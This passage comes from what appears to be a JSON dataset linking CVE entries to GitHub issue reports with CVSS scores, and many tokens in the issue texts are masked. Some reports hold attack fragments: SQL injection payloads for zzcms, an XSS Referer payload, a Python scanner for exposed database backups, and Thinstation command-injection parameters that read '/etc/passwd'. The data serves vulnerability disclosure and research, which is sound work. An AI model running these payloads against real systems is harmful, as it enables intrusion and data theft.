  35369. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35370. "severity": "CRITICAL",
  35371. "baseScore": 9.8,
  35372. "impactScore": 5.9,
  35373. "exploitabilityScore": 3.9
  35374. },
  35375. {
  35376. "CVE_ID": "CVE-2019-12352",
  35377. "Issue_Url_old": "https://github.com/cby234/zzcms/issues/5",
  35378. "Issue_Url_new": "https://github.com/cby234/zzcms/issues/5",
  35379. "Repo_new": "cby234/zzcms",
  35380. "Issue_Created_At": "2019-05-28T00:43:57Z",
  35381. "description": "zzcms NUMBERTAG SQL INJECTION LIST NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is not false sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union SQL injection APITAG xls&sql=select+count NUMBERTAG APITAG &id NUMBERTAG B NUMBERTAG D NUMBERTAG union select APITAG a, FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is not false sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union SQL injection APITAG xls&sql=select+count NUMBERTAG APITAG &id NUMBERTAG B NUMBERTAG D NUMBERTAG union select APITAG a, FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in COOKIE FILETAG When we check the query there is no single quote to COOKIE FILETAG n var will get value via GET FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in COOKIE FILETAG When we check the query there is no single quote to COOKIE FILETAG n var will get value via GET FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG \" POC : union sql injection tablename=zzcms_main&id FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG \" POC : union Time base sql injection id FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG \" POC : Time base sql injection id FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union Time base sql injection id FILETAG FILETAG",
  35382. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  35383. "severity": "HIGH",
  35384. "baseScore": 8.8,
  35385. "impactScore": 5.9,
  35386. "exploitabilityScore": 2.8
  35387. },
  35388. {
  35389. "CVE_ID": "CVE-2019-12361",
  35390. "Issue_Url_old": "https://github.com/coolboy0816/audit/issues/3",
  35391. "Issue_Url_new": "https://github.com/coolboy0816/audit/issues/3",
  35392. "Repo_new": "coolboy0816/audit",
  35393. "Issue_Created_At": "2019-04-04T08:37:31Z",
  35394. "description": "Empire CMS/URL jump&&reflection XSS&&condition csrf. From parameters for collecting articles payload: post: PATHTAG APITAG APITAG FILETAG Because of Empire CMS automatically jumps when the collection is successful, vulnerabilities are upgraded to remote JS code execution without interaction with users Prove\uff1a FILETAG Loophole utilization\uff1a Set jump to remote URL with attack APITAG the script as follows\uff1a FILETAG APITAG APITAG APITAG APITAG ERRORTAG CODETAG APITAG APITAG APITAG APITAG APITAG FILETAG APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG Payload contains a conditional APITAG the background source authentication code is not opened in the background security mode, CSRF can be used to change the dynamic page template. Here, we choose to resend the registered activation mail page. The path is PATHTAG The effect of the attack is as follows\uff1a FILETAG",
  35395. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  35396. "severity": "MEDIUM",
  35397. "baseScore": 6.1,
  35398. "impactScore": 2.7,
  35399. "exploitabilityScore": 2.8
  35400. },
  35401. {
  35402. "CVE_ID": "CVE-2019-12362",
  35403. "Issue_Url_old": "https://github.com/coolboy0816/audit/issues/4",
  35404. "Issue_Url_new": "https://github.com/coolboy0816/audit/issues/4",
  35405. "Repo_new": "coolboy0816/audit",
  35406. "Issue_Created_At": "2019-04-04T09:24:52Z",
  35407. "description": "Empire CMS/reflect xss. When a user logs APITAG XSS exists in Referer pyload\uff1a Referer\uff1ajavascript:alert APITAG JS can be injected into the page by Referer The vulnerability involved is the parameter key in Referer FILETAG FILETAG",
  35408. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  35409. "severity": "MEDIUM",
  35410. "baseScore": 6.1,
  35411. "impactScore": 2.7,
  35412. "exploitabilityScore": 2.8
  35413. },
  35414. {
  35415. "CVE_ID": "CVE-2019-12395",
  35416. "Issue_Url_old": "https://github.com/webbukkit/dynmap/issues/2474",
  35417. "Issue_Url_new": "https://github.com/webbukkit/dynmap/issues/2474",
  35418. "Repo_new": "webbukkit/dynmap",
  35419. "Issue_Created_At": "2019-05-02T08:18:24Z",
  35420. "description": "Required login bypass vulnerability. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Server Information Spigot version NUMBERTAG ersion NUMBERTAG beta NUMBERTAG I can reproduce this issue consistently I have searched for this issue previously and it was either not previously reported. APITAG Issue Description Due to missing login check in APITAG , attacker can see map image without login despite \"login required\" is enabled in configuration. APITAG Reproduce Steps NUMBERTAG Enable APITAG and APITAG in configuration NUMBERTAG Try this APITAG URLTAG",
  35421. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  35422. "severity": "MEDIUM",
  35423. "baseScore": 5.3,
  35424. "impactScore": 1.4,
  35425. "exploitabilityScore": 3.9
  35426. },
  35427. {
  35428. "CVE_ID": "CVE-2019-12439",
  35429. "Issue_Url_old": "https://github.com/projectatomic/bubblewrap/issues/304",
  35430. "Issue_Url_new": "https://github.com/containers/bubblewrap/issues/304",
  35431. "Repo_new": "containers/bubblewrap",
  35432. "Issue_Created_At": "2019-03-02T11:29:02Z",
  35433. "description": "potentially insecure use of /tmp. MENTIONTAG reported this Debian bug NUMBERTAG CVETAG : > [If] PATHTAG doesn't exist and couldn't be created > (as was the case on my system), bubblewrap falls back to > PATHTAG Local attacker could exploit this to prevent > other users from running bubblewrap, for example: > > getent passwd | cut d: f3 | xargs printf PATHTAG | xargs touch > > But it gets worse, because bubblewrap is happy to use existing > PATHTAG even when the directory is owned by some else. > In the worst case, this could be exploited by a local user to execute > arbitrary code in the container. APITAG I couldn't find any way to > exploit this without disabling protected_symlinks.)",
  35434. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  35435. "severity": "HIGH",
  35436. "baseScore": 7.8,
  35437. "impactScore": 5.9,
  35438. "exploitabilityScore": 1.8
  35439. },
  35440. {
  35441. "CVE_ID": "CVE-2019-12452",
  35442. "Issue_Url_old": "https://github.com/containous/traefik/issues/4917",
  35443. "Issue_Url_new": "https://github.com/traefik/traefik/issues/4917",
  35444. "Repo_new": "traefik/traefik",
  35445. "Issue_Created_At": "2019-05-29T14:19:49Z",
  35446. "description": "Authentication hashes are available through the API. Do you want to request a feature or report a bug ? Bug Did you try using a NUMBERTAG configuration for the version NUMBERTAG Yes [x] No What did you do? Enabled Traefik API, creating a frontend protected with a user / password Fetched the API What did you expect to see? CODETAG What did you see instead? CODETAG => So I can totally use a rainbow table to de hash the password until NUMBERTAG characters easily (more is challenging as for today), even if there is a salt in the basic auth. Output of traefik version : APITAG version of Traefik are you using?_) CODETAG What is your environment & configuration (arguments, toml, provider, platform, ...)? Simple reproduction case, with a frontend on the API itself for the sake of simplicity: APITAG is user and password is password ) CODETAG If applicable, please paste the log output in DEBUG level ( APITAG switch) Not applicable",
  35447. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  35448. "severity": "HIGH",
  35449. "baseScore": 7.5,
  35450. "impactScore": 5.9,
  35451. "exploitabilityScore": 1.6
  35452. },
  35453. {
  35454. "CVE_ID": "CVE-2019-12457",
  35455. "Issue_Url_old": "https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3",
  35456. "Issue_Url_new": "https://github.com/emreovunc/filerun-vulnerabilities/issues/3",
  35457. "Repo_new": "emreovunc/filerun-vulnerabilities",
  35458. "Issue_Created_At": "2019-07-01T18:36:51Z",
  35459. "description": "Remediation. The now available APITAG update APITAG fixes the reported issues. The update can be installed from the APITAG control panel: URLTAG Great work with your findings! Kindly drop us a quick message if you find anything else in the future, to give the many users of our software a chance of protecting themselves. You'd still get the credit for it.",
  35460. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  35461. "severity": "MEDIUM",
  35462. "baseScore": 5.3,
  35463. "impactScore": 1.4,
  35464. "exploitabilityScore": 3.9
  35465. },
  35466. {
  35467. "CVE_ID": "CVE-2019-12481",
  35468. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1249",
  35469. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1249",
  35470. "Repo_new": "gpac/gpac",
  35471. "Issue_Created_At": "2019-05-27T07:11:13Z",
  35472. "description": "4 bugs found in gpac NUMBERTAG release. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! x] I looked for a similar issue and couldn't find any. [ ] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG APITAG version APITAG NUMBERTAG description APITAG download link others please send email to EMAILTAG if you have any questions. EMAILTAG NUMBERTAG null pointer dereference description An issue was discovered in APITAG NUMBERTAG There is a/an null pointer dereference in function APITAG at APITAG NUMBERTAG commandline APITAG info APITAG source ERRORTAG my dbg CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. APITAG NUMBERTAG null pointer dereference description An issue was discovered in APITAG NUMBERTAG There is a/an null pointer dereference in function APITAG at APITAG NUMBERTAG commandline APITAG info APITAG source CODETAG my debug CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. EMAILTAG NUMBERTAG null pointer dereference description An issue was discovered in APITAG NUMBERTAG There is a/an null pointer dereference in function APITAG at APITAG NUMBERTAG commandline APITAG info APITAG source ERRORTAG mydebug CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. APITAG NUMBERTAG heap buffer overflow description An issue was discovered in APITAG NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline APITAG info APITAG source CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. other info ERRORTAG [POC URLTAG",
  35473. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35474. "severity": "MEDIUM",
  35475. "baseScore": 5.5,
  35476. "impactScore": 3.6,
  35477. "exploitabilityScore": 1.8
  35478. },
  35479. {
  35480. "CVE_ID": "CVE-2019-12494",
  35481. "Issue_Url_old": "https://github.com/gardener/vpn/issues/40",
  35482. "Issue_Url_new": "https://github.com/gardener/vpn/issues/40",
  35483. "Repo_new": "gardener/vpn",
  35484. "Issue_Created_At": "2019-03-27T13:01:51Z",
  35485. "description": "Add firewall rules to vpn seed pod. We should block all traffic from the shoot cluster to the control plane in the seed cluster by adding firewall rules to the vpn seed pod.",
  35486. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  35487. "severity": "HIGH",
  35488. "baseScore": 7.5,
  35489. "impactScore": 3.6,
  35490. "exploitabilityScore": 3.9
  35491. },
  35492. {
  35493. "CVE_ID": "CVE-2019-12499",
  35494. "Issue_Url_old": "https://github.com/netblue30/firejail/issues/2401",
  35495. "Issue_Url_new": "https://github.com/netblue30/firejail/issues/2401",
  35496. "Repo_new": "netblue30/firejail",
  35497. "Issue_Created_At": "2019-02-13T19:35:12Z",
  35498. "description": "CVETAG . Is firejail vulnerable to this? It seems to be a common implementation issue when using privileged namespaces. runc, docker, k8s, lxc, and flatpak have all had patches issued for it. See URLTAG URLTAG URLTAG URLTAG",
  35499. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35500. "severity": "HIGH",
  35501. "baseScore": 8.1,
  35502. "impactScore": 5.9,
  35503. "exploitabilityScore": 2.2
  35504. },
  35505. {
  35506. "CVE_ID": "CVE-2019-12564",
  35507. "Issue_Url_old": "https://github.com/srsec/-srsec-/issues/1",
  35508. "Issue_Url_new": "https://github.com/srsec/-srsec-/issues/1",
  35509. "Repo_new": "srsec/-srsec-",
  35510. "Issue_Created_At": "2019-05-22T08:41:54Z",
  35511. "description": "Any user can view or now, the whole station database backup file. The latest version of APITAG NUMBERTAG Release NUMBERTAG the background can back up the entire station data, but does not have access control on the backup file, resulting in any user can view or now the database file. APITAG in to the background and back up data through the data backup APITAG generate a sql file in the format of the date. FILETAG NUMBERTAG We look at the path generated by the backup file. FILETAG FILETAG APITAG user can access the backup file path through the url, and can view the download backup file. FILETAG FILETAG APITAG file generation format (current date and time format file). FILETAG FILETAG NUMBERTAG follow up APITAG the core file and make no access restrictions on the backup file, resulting in a vulnerability. FILETAG NUMBERTAG POC FILETAG needs to be customized to generate a dictionary in time format)\u3002 import APITAG import time import threading url = input(\"url\uff1a\") txt = APITAG open_url = [] all_url = [] threads = [] Can be customized def search_url(url,txt): with open(txt,'r') as f: for each in f: each = APITAG urllist = url + each +'.sql' APITAG def handle_url(urllist): APITAG try: req = APITAG Judgment return code if APITAG or NUMBERTAG APITAG APITAG file\uff1a\"+urllist+' ') if APITAG APITAG file\uff1a\"+urllist+' ') APITAG except: pass def APITAG search_url(url,txt) for each in all_url: t = APITAG = handle_url,args=(each,)) APITAG APITAG for t in threads: APITAG if open_url: APITAG scan, successful url:\uff1a\") for each in open_url: print(\"[+]\"+each) else: APITAG is a scan to the background of the website (maybe the dictionary is not enough to force)\") if __name__==\"__main__\": Judge program run time start = APITAG APITAG end = APITAG APITAG function spend time is NUMBERTAG f seconds\" %(end start)) APITAG a specific date dictionary file script import time Can be customized for h in range NUMBERTAG for i in range NUMBERTAG for s in range NUMBERTAG if(h NUMBERTAG and i NUMBERTAG and s NUMBERTAG APITAG print(data) elif h NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG APITAG print(data) elif h NUMBERTAG and (i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and h APITAG NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and i APITAG NUMBERTAG APITAG print(data) elif h NUMBERTAG and (i NUMBERTAG and i APITAG NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and h NUMBERTAG and (i NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and h NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and h NUMBERTAG and (s NUMBERTAG and s NUMBERTAG and (i NUMBERTAG and i NUMBERTAG APITAG print(data) else: APITAG print(data)",
  35512. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35513. "severity": "CRITICAL",
  35514. "baseScore": 9.8,
  35515. "impactScore": 5.9,
  35516. "exploitabilityScore": 3.9
  35517. },
  35518. {
  35519. "CVE_ID": "CVE-2019-12566",
  35520. "Issue_Url_old": "https://github.com/wp-statistics/wp-statistics/issues/271",
  35521. "Issue_Url_new": "https://github.com/wp-statistics/wp-statistics/issues/271",
  35522. "Repo_new": "wp-statistics/wp-statistics",
  35523. "Issue_Created_At": "2019-05-30T05:14:25Z",
  35524. "description": "Page's title should be encoded or filtering html entities/javascript code. I was testing on : Wordpress NUMBERTAG WP Statistic NUMBERTAG Account with Editor role can create Post with Title that contain javascript/html. For example : APITAG FILETAG WP statistics page that use these title will got affected for xss attack, for example : overviews, pages,... FILETAG Even if the Editor delete the Post, but it still remain in top NUMBERTAG page that got most hit, the Overviews page still be affected. So in reality, attacker that controls the Editor account can create page with title that contains maclious javascript code that steal admin cookie (for example), visit it a lot that make it be in top NUMBERTAG page most visited, delete the post so admin wont notice the weird post that have javascript in title. And when admin click on Overviews page of WP Statistic, his cookie will be stolen.",
  35525. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  35526. "severity": "MEDIUM",
  35527. "baseScore": 5.4,
  35528. "impactScore": 2.7,
  35529. "exploitabilityScore": 2.3
  35530. },
  35531. {
  35532. "CVE_ID": "CVE-2019-12589",
  35533. "Issue_Url_old": "https://github.com/netblue30/firejail/issues/2718",
  35534. "Issue_Url_new": "https://github.com/netblue30/firejail/issues/2718",
  35535. "Repo_new": "netblue30/firejail",
  35536. "Issue_Created_At": "2019-05-21T08:36:14Z",
  35537. "description": "seccomp bypass when joining existing jail. seccomp filters are copied into APITAG , and are writable within the jail. A malicious process can modify files from inside the jail. Processes that are later joined to the jail will not have seccomp filters applied. repro steps compile program to call blacklisted syscall CODETAG create interactive jail session APITAG try to run program inside jail, noting syscall is blocked APITAG open new terminal and run program by joining jail, noting syscall is blocked APITAG back in original interactive jail session, empty the APITAG file and attempt to run program, noting syscall is blocked APITAG open new terminal and run program by joining jail, noting syscall is NOT blocked APITAG",
  35538. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
  35539. "severity": "HIGH",
  35540. "baseScore": 8.8,
  35541. "impactScore": 6.0,
  35542. "exploitabilityScore": 2.0
  35543. },
  35544. {
  35545. "CVE_ID": "CVE-2019-12618",
  35546. "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/5783",
  35547. "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/5783",
  35548. "Repo_new": "hashicorp/nomad",
  35549. "Issue_Created_At": "2019-06-05T17:50:45Z",
  35550. "description": "CVETAG : Privilege Escalation in NUMBERTAG It was discovered that exec driver tasks run with full Linux capabilities such that processes can escalate to run as privileged root user, despite running as the Linux unprivileged user, nobody. This vulnerability affects versions NUMBERTAG and NUMBERTAG of Nomad, both OSS and Enterprise and was fixed in NUMBERTAG Background Nomad allows running various types of workloads. The exec driver runs processes in a chroot environment and a lightweight container. By default, Nomad NUMBERTAG runs exec processes as nobody user with no Linux capabilities. This meant that processes could not do any privileged operations, ones commonly associated with root. However, a regression in Nomad NUMBERTAG allows such processes to perform privileged operations that can be malicious. For example, a process can conceivably escape the chroot, kill any host process, read and manipulate any file inside the chroot, or bind to privileged ports NUMBERTAG Some commands (e.g. mount) may block malicious operations directly, as they detect that the user is not root, but a determined attacker can circumvent this protection by performing the kernel system call directly. This vulnerability constitutes a serious unintentional privilege grant, and Nomad NUMBERTAG reverts to Nomad NUMBERTAG capabilities. It is worth noting that the exec driver is not intended to provide strong security isolation, as exec tasks can access any network services on host (including nomad agent if not configured with tls and ACL, and the cloud metadata endpoints). Users are encouraged to use VM based drivers (qemu) or container based drivers (e.g. docker) to enforce stricter security isolation. Remediation Clusters with the exec driver enabled must upgrade to NUMBERTAG Only Nomad clients must be upgraded to fix the vulnerability. Alternatively, the exec driver may be disabled using the client configuration or via Sentinel in Nomad Enterprise. No workaround is present to run exec tasks safely in a NUMBERTAG or NUMBERTAG cluster. To disable the exec task driver use the following configuration on every client node: APITAG See the client configuration documentation URLTAG for more details.",
  35551. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35552. "severity": "CRITICAL",
  35553. "baseScore": 9.8,
  35554. "impactScore": 5.9,
  35555. "exploitabilityScore": 3.9
  35556. },
  35557. {
  35558. "CVE_ID": "CVE-2019-12728",
  35559. "Issue_Url_old": "https://github.com/grails/grails-core/issues/11250",
  35560. "Issue_Url_new": "https://github.com/grails/grails-core/issues/11250",
  35561. "Repo_new": "grails/grails-core",
  35562. "Issue_Created_At": "2019-02-19T21:52:47Z",
  35563. "description": "FILETAG FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code has existed since NUMBERTAG to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Source Locations URLTAG Public Disclosure Option NUMBERTAG File for a CVE A project maintainer for this project should probably file for a CVE number to inform the public about this vulnerability in the build for this project. The goal is to inform the public that there was a potential for published build artifacts to have been maliciously compromised in earlier releases. If a maintainer on this project works for or is associated with a CNA, please have them file it with them: FILETAG Otherwise, an open source CVE should be filed for here: FILETAG Option NUMBERTAG Manually validate the release artifacts If this project's build is fully reproducible URLTAG . An alternative to filing for a CVE is to go back and build the earlier releases (with the HTTPS patch applied) to confirm the artifacts were not tampered when they were built. This can be done by comparing the hashes of the artifacts built locally with the ones published. If the hashes of all previous artifacts match those that are published, you can safely assume that the releases were not tampered with. Again, this assumes that the build if fully reproducible and will require significantly more work.",
  35564. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35565. "severity": "HIGH",
  35566. "baseScore": 8.1,
  35567. "impactScore": 5.9,
  35568. "exploitabilityScore": 2.2
  35569. },
  35570. {
  35571. "CVE_ID": "CVE-2019-12732",
  35572. "Issue_Url_old": "https://github.com/ankane/chartkick/issues/488",
  35573. "Issue_Url_new": "https://github.com/ankane/chartkick/issues/488",
  35574. "Repo_new": "ankane/chartkick",
  35575. "Issue_Created_At": "2019-06-04T19:07:47Z",
  35576. "description": "XSS Vulnerability in Chartkick Ruby Gem. Under certain conditions, the Chartkick Ruby gem is vulnerable to a cross site scripting (XSS) attack. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact Chartkick is vulnerable to a cross site scripting (XSS) attack if BOTH the following conditions are met: Condition NUMBERTAG It's used with APITAG (this is not the default for Rails) OR used with a non Rails framework like Sinatra. Condition NUMBERTAG Untrusted data or options are passed to a chart. APITAG All users running an affected release should upgrade immediately.",
  35577. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
  35578. "severity": "MEDIUM",
  35579. "baseScore": 4.7,
  35580. "impactScore": 2.7,
  35581. "exploitabilityScore": 1.6
  35582. },
  35583. {
  35584. "CVE_ID": "CVE-2019-12741",
  35585. "Issue_Url_old": "https://github.com/jamesagnew/hapi-fhir/issues/1335",
  35586. "Issue_Url_new": "https://github.com/hapifhir/hapi-fhir/issues/1335",
  35587. "Repo_new": "hapifhir/hapi-fhir",
  35588. "Issue_Created_At": "2019-06-05T14:27:51Z",
  35589. "description": "Potential XSS exploit in hapi fhir testpage overlay. This is a public tracking ticket to document the fix for an XSS exploit reported by Mudit Punia and Deshuyant Garg. The issue has been corrected in HAPI FHIR NUMBERTAG ia the following commit: URLTAG In this issue, when using the hapi fhir testpage overlay (the testing UI most known for its display on FILETAG ) several URL parameters are not sanitized. This could lead to information disclosure (such as cookies) via a specially crafted URL.",
  35590. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  35591. "severity": "MEDIUM",
  35592. "baseScore": 6.1,
  35593. "impactScore": 2.7,
  35594. "exploitabilityScore": 2.8
  35595. },
  35596. {
  35597. "CVE_ID": "CVE-2019-12760",
  35598. "Issue_Url_old": "https://github.com/davidhalter/parso/issues/75",
  35599. "Issue_Url_new": "https://github.com/davidhalter/parso/issues/75",
  35600. "Repo_new": "davidhalter/parso",
  35601. "Issue_Created_At": "2019-06-11T08:51:37Z",
  35602. "description": "Deserialization vulnerability ( CVETAG ). Vulnerability Description : See CVETAG URLTAG Note : Let us be honest, this should be very unlikely to be exploitable in the wild.",
  35603. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  35604. "severity": "HIGH",
  35605. "baseScore": 7.5,
  35606. "impactScore": 5.9,
  35607. "exploitabilityScore": 1.6
  35608. },
  35609. {
  35610. "CVE_ID": "CVE-2019-12771",
  35611. "Issue_Url_old": "https://github.com/Thinstation/thinstation/issues/427",
  35612. "Issue_Url_new": "https://github.com/thinstation/thinstation/issues/427",
  35613. "Repo_new": "thinstation/thinstation",
  35614. "Issue_Created_At": "2019-06-06T23:12:21Z",
  35615. "description": "CGI Generic Command Execution APITAG on NUMBERTAG Could affect latest version. The following resources are vulnerable to arbitrary command execution on Thinstation in /cgi APITAG and /cgi APITAG APITAG /cgi APITAG action=;id eject;ifconfig back;ls alt forward;whoami pause;hostname /cgi APITAG OK=;cat /etc/passwd Please patch asap. Could affects up to latest versions. For more information read: URLTAG",
  35616. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35617. "severity": "CRITICAL",
  35618. "baseScore": 9.8,
  35619. "impactScore": 5.9,
  35620. "exploitabilityScore": 3.9
  35621. },
  35622. {
  35623. "CVE_ID": "CVE-2019-12779",
  35624. "Issue_Url_old": "https://github.com/ClusterLabs/libqb/issues/338",
  35625. "Issue_Url_new": "https://github.com/clusterlabs/libqb/issues/338",
  35626. "Repo_new": "clusterlabs/libqb",
  35627. "Issue_Created_At": "2019-03-01T14:15:25Z",
  35628. "description": "Insecure Temporary Files. Libqb creates files in world writable directories ( APITAG , APITAG ) with rather predictable file names (e.g. APITAG in case of APITAG Also APITAG flag is not used when opening the files. This could be exploited by a local attacker to overwrite privileged system files (if not restricted by sandboxing, MAC or symlinking policies). At least APITAG flag should be used. I'd also use more complex logic where files are created with unpredictable names (also using APITAG ) and then possibly renamed to match file naming convention (if the protocol does not allow completely random file names). I would not use files for IPC.",
  35629. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  35630. "severity": "HIGH",
  35631. "baseScore": 7.1,
  35632. "impactScore": 5.2,
  35633. "exploitabilityScore": 1.8
  35634. },
  35635. {
  35636. "CVE_ID": "CVE-2019-12790",
  35637. "Issue_Url_old": "https://github.com/radare/radare2/issues/14211",
  35638. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/14211",
  35639. "Repo_new": "radareorg/radare2",
  35640. "Issue_Created_At": "2019-06-02T19:35:30Z",
  35641. "description": "ragg2 crash on long valid input.. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f2caa3 commit: APITAG build NUMBERTAG Expected behavior APITAG Actual behavior APITAG Steps to reproduce the behavior Unzip FILETAG and you will get APITAG Additional Logs, screenshots, source code, configuration dump, ... After checking the source code, the vulnerability is caused by lacking boundary checking for \"egg APITAG URLTAG , resulting a heap buffer overflow. It could be fixed quickly by adding associated checking.",
  35642. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35643. "severity": "HIGH",
  35644. "baseScore": 7.8,
  35645. "impactScore": 5.9,
  35646. "exploitabilityScore": 1.8
  35647. },
  35648. {
  35649. "CVE_ID": "CVE-2019-12791",
  35650. "Issue_Url_old": "https://github.com/serghey-rodin/vesta/issues/1921",
  35651. "Issue_Url_new": "https://github.com/serghey-rodin/vesta/issues/1921",
  35652. "Repo_new": "serghey-rodin/vesta",
  35653. "Issue_Created_At": "2019-07-29T17:28:57Z",
